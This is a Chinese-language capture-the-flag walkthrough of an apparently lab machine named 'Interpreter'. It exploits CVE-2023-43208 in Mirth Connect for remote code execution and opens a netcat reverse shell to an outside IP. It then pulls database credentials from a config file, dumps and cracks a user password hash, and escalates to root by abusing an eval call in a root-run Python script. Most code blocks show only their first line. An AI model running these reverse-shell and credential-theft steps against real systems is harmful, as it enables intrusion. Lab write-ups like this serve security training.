[Season10] Interpreter WP
Recon
nmap
1 | PORT STATE SERVICE REASON VERSION |
Web-Mirth Connect
CVE-2023-43208 RCE
查看应用 Mirth Connect 的版本
1 | curl -k -H 'X-Requested-With: test' https://$IP:443/api/server/version |
利用 jakabakos/CVE-2023-43208-mirth-connect-rce-poc 反弹 shell
1 | python3 CVE-2023-43208.py -u "https://$IP" -c 'nc 10.10.16.2 6666 -e /bin/bash' |
主机信息收集
conf/mirth.properties 拿到数据库信息
1 | database = mysql |
搭建代理
1 | ./proxy -selfcert |
连接数据库
1 | mysql -u mirthdb -p'MirthPass123!' -h 240.0.0.1 -D mc_bdd_prod |
查找用户密码 hash
1 | mysql> select * from PERSON; |
我们拿到用户 sedric 的密码哈希 u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==
前 8 字节是 salt 后 32 字节是 hash
1 | echo "sha256:600000:u/+LBBOUnac=:YshQbDDqCAzy21EdK5OfZBJD1Ne4rXa1VgP5CzLd8Ps=" > hash.txt |
爆破得到 snowflake1 用户名为 sedric
1 | sedric@interpreter:~$ cat user.txt |
提权
查看端口发现有个 54321 端口开着,应该是个 web 应用
1 | curl 240.0.0.1:54321 -v -H "Host: interpreter.htb" |
注意到运行的进程中有 root 启动的进程
1 | root 3500 0.0 0.8 1055696 34976 ? Ss Feb19 0:55 /usr/bin/python3 /usr/local/bin/notif.py |
查看 /usr/local/bin/notif.py
1 | #!/usr/bin/env python3 |
应用中执行了 eval,可以利用这个实现 rce
exp 反弹 shell
1 | import requests |
root flag
1 | cat root.txt |
Hash
1 | root:$y$j9T$o.VVihLzQteSMxpHLdRkO.$ye7gwugB75H18vxlZ9Yp8uak36M3opreZHoWrWOJto7:20307:0:99999:7::: |